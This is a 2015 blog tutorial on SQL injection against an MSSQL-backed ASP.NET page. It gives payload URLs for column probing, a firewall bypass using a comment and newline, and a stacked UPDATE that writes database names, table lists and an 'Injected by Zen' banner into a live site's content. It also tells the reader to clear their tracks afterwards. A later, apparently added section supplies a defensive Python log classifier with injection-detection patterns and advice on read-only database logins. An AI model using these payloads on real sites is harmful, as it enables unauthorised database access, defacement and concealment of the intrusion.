In the Name of ALLAH the Most Beneficent and the Merciful

As I promised before, here we are back with a new tutorial on Second Order Exploitation in an MSSQL-based website. I posted a basic tutorial on this earlier, MSSQL Second Order Exploitation, where I discussed the same trick we are going to use in this tutorial.

Here is the complete video for this tutorial; I hope you enjoy it. We'll use a demo site throughout this tutorial.


http://www.demosite.com/press-media-detaile.aspx?id=95'

Now let's find out the number of columns.
http://www.demosite.com/press-media-detaile.aspx?id=95 order by 6--
Error
http://www.demosite.com/press-media-detaile.aspx?id=95 order by 5--
Error, but a different one, which means it's working. Let's try a Union query.
http://www.demosite.com/press-media-detaile.aspx?id=95 Union select 1,2,3,4,5--
And that's what I got in response...

They said they were using a firewall, my reaction was like,


I made my next move, bypassing the firewall:
http://www.demosite.com/press-media-detaile.aspx?id=95 Union --%0aselect 1,2,3,4,5--
I got another error

It says that this is not the right number of columns, and here we can also see a query as well. So let's try 8 columns according to the query.
http://www.demosite.com/press-media-detaile.aspx?id=95 Union --%0aselect 1,2,3,4,5,6,7,8--
Here we got another Error :P

Now let's try using Null and union all select.
http://www.demosite.com/press-media-detaile.aspx?id=95 Union all--%0aselect null,null,null,null,null,null,null,null--
We got an error on another, different line, which means there are different queries having different numbers of columns, so technically it's not possible here to inject using Union select without having some special scenario. Now I tried Error based.
http://www.demosite.com/press-media-detaile.aspx?id=95 and 1=@@version--
I was fucking surprised, no output in the error over here.



So now it's the right time to activate my sharingan, let's do it.



As I activated my sharingan, I was able to see through the code and understand the whole scenario here: we can see a query having all the columns and the table name, which was visible in the error. MSSQL allows stacked queries, so why not just try Second Order Injection?


Now we are set, let's try Second Order Exploitation. It's always a good idea to choose a hidden place for our output, so I decided on MetaData. I will use the Update query; I already have the column names and the table names.
http://www.demosite.com/press-media-detaile.aspx?id=95;update tablename set metadata_content=@@version where id=95--
Now to see the output, go and check the page for the id into which you injected; we injected in id 95.
http://www.demosite.com/press-media-detaile.aspx?id=95
Here I checked the source code of the page, and here we got the output.

Now here is our final query, which will inject the whole output into the column.
http://www.demosite.com/press-media-detaile.aspx?id=95;update tablename set meta_description='"><'%2b'font color=red'%2b'>Injected by Zen<'%2b'br'%2b'>Database :: '%2bdb_name()%2b'<'%2b'br'%2b'>User :: '%2buser%2b'<'%2b'br'%2b'><'%2b'font color=green'%2b'>'%2breplace(replace((select+table_name%2b'<'%2b'br'%2b'>' from information_schema.tables FOR+XML+PATH('')),'%26lt;','<'),'%26gt;','>')%2b'<'%2b'!--' where id=95;--
And here is our output. Once you are done, please remember to clear the tracks by setting that column back to its default value.
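For reviewing web server logs for the request shapes shown in this tutorial, here is an added example (not code from the original post): it treats the id parameter as an integer-only value, the same allow-list check the page handler should apply before the value reaches SQL, and labels anything else by the pattern it matches. The classify function, the rule names and the sample request lines are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Rules mirror the request shapes in this tutorial; matched after URL-decoding.
RULES = [
    ("stacked_write", re.compile(r";\s*(update|insert|delete|drop|exec)\b", re.I)),
    ("comment_newline_split", re.compile(r"--[^\n]*\n\s*select\b", re.I)),
    ("union_select", re.compile(r"\bunion\b(\s+all)?\s+select\b", re.I)),
    ("order_by_probe", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("server_info_expr", re.compile(r"@@version|\bdb_name\s*\(", re.I)),
]

# Constructed sample request targets (hypothetical log entries, not real traffic).
SAMPLES = [
    "/press-media-detaile.aspx?id=95",
    "/press-media-detaile.aspx?id=95'",
    "/press-media-detaile.aspx?id=95+order+by+6--",
    "/press-media-detaile.aspx?id=95+Union+--%0aselect+1,2,3,4,5--",
    "/press-media-detaile.aspx?id=95+and+1=@@version--",
    "/press-media-detaile.aspx?id=95;update+tablename+set+metadata_content"
    "=@@version+where+id=95--",
]

def classify(target, param="id"):
    """Return labels for every `param` value that is not a plain integer.

    An empty list means each occurrence of the parameter passed the
    integer allow-list; duplicates are all checked because ASP.NET joins
    repeated parameters into one value.
    """
    labels = []
    for pair in target.partition("?")[2].split("&"):
        name, _, raw = pair.partition("=")   # split on the first '=' only
        if unquote_plus(name).lower() != param:
            continue
        value = unquote_plus(raw)            # decodes %0a, %2b and '+'
        if re.fullmatch(r"[0-9]{1,9}", value):
            continue                         # expected shape, nothing to flag
        hits = [label for label, rx in RULES if rx.search(value)]
        labels.extend(hits or ["non_integer_id"])
    return labels

if __name__ == "__main__":
    for sample in SAMPLES:
        print(classify(sample) or ["ok"], sample)
```

The stacked UPDATE only succeeds when the web application's database login has write access to the content table, so a read-only login for public pages removes that path even if a request slips past the input check.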


I hope you enjoyed reading the tutorial.

Author : Zen Javanicus
Date : 2015-05-11